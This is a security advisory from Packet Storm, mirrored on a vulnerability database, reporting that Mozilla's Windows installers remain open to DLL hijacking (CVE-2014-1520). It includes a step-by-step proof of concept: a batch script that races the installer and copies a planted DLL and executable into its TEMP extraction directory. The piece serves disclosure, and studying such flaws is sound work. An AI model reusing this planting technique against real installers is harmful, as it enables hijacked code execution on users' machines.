Lucene search
K

Mozilla Firefox DLL Hijacking

🗓️ 15 Jun 2016 00:00:00Reported by Stefan KanthakType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 44 Views

Mozilla Firefox DLL Hijacking CVE-2014-1520 vulnerability in Windows installer

Related
Code
`Hi @ll,  
  
<https://bugzilla.mozilla.org/show_bug.cgi?id=961676> should  
have fixed CVE-2014-1520 in Mozilla's executable installers for  
Windows ... but does NOT!  
  
JFTR: this type of vulnerability (really: a bloody stupid trivial  
beginner's error!) is well-known and well-documented as  
<https://cwe.mitre.org/data/definitions/379.html>.  
  
  
Proof of concept/demonstration:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
0. download "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",  
"Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"  
and save them in an arbitrary directory;  
  
1. download <http://home.arcor.de/skanthak/download/SHFOLDER.DLL>  
plus <http://home.arcor.de/skanthak/download/SENTINEL.EXE> and  
save them in an(other) arbitrary directory;  
  
2. start your editor, copy and paste the following 10 lines and  
save them as "POC.CMD" in the same directory as "SHFOLDER.DLL"  
and "SENTINEL.EXE" downloaded in step 1:  
  
:WAIT1  
@If Not Exist "%TEMP%\7z*.tmp" Goto :WAIT1  
For /D %%! In ("%TEMP%\7z*.tmp") Do Set foobar=%%!  
Copy "%~dp0shfolder.dll" "%foobar%\shfolder.dll"  
:WAIT2  
@If Not Exist "%foobar%\core\maintenanceservice.exe" Goto :WAIT2  
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice.exe"  
:WAIT3  
@If Not Exist "%foobar%\core\maintenanceservice_installer.exe" Goto :WAIT3  
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice_installer.exe"  
  
3. execute the batch script "POC.CMD" created in step 2;  
  
4. execute "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",  
"Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"  
downloaded in step 0. and proceed as directed: notice the message  
boxed displayed from the copies of "SHFOLDER.DLL" and "SENTINEL.EXE"  
placed by the batch script started in step 3 in the unsafe TEMP  
subdirectory created by Mozilla's vulnerable executable installers!  
  
PWNED!  
  
  
Mitigation(s):  
~~~~~~~~~~~~~~  
  
0. don't use executable installers. DUMP THEM, NOW!  
  
1. see <http://home.arcor.de/skanthak/!execute.html> as well as  
<http://home.arcor.de/skanthak/SAFER.html>.  
  
2. stay away from Mozilla's vulnerable installers for their Windows  
software (at least until Mozilla starts to develop a sense for  
the safety and security of their users).  
  
  
stay tuned  
Stefan Kanthak  
  
  
Timeline:  
~~~~~~~~~  
  
2015-10-25 <https://bugzilla.mozilla.org/show_bug.cgi?id=1218199>  
  
not even an attempt to fix this vulnerability (check but  
<https://blog.mozilla.org/blog/2015/10/23/mozilla-launches-open-source-support-program/>)  
  
2016-04-30 <https://bugzilla.mozilla.org/show_bug.cgi?id=1269111>  
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269113>  
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269122>  
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269123>  
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269142>  
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269144>  
  
not even an attempt to fix this vulnerability (check but  
<https://blog.mozilla.org/blog/2016/06/09/help-make-open-source-secure/>)  
  
2016-06-15 deadline expired after 45 days, report published  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Jun 2016 00:00Current
EPSS0.00408
44